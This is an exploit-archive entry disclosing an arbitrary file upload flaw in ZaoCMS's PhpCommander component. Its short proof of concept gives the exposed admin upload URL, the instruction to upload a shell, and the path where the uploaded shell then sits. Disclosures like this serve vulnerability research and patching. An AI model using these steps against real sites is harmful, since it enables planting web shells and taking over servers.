id: 5234
date: 05/21/2009
title: ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability
author: Qabandi
cves: 

===============================================================
ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability
===============================================================


From Kuwait PEACE

=Vuln:		ZaoCMS (PhpCommander) - Arbitrary File Upload
=INFO:		http://zaocms.com/
=BUY:  		http://zaocms.com/
=DORK:		--


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-File-Upload-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Go to:
http://localhost/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=upload

Upload shell

location:

http://localhost/documents/SHELL.PHP

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



#  0day.today [2023-03-26]  #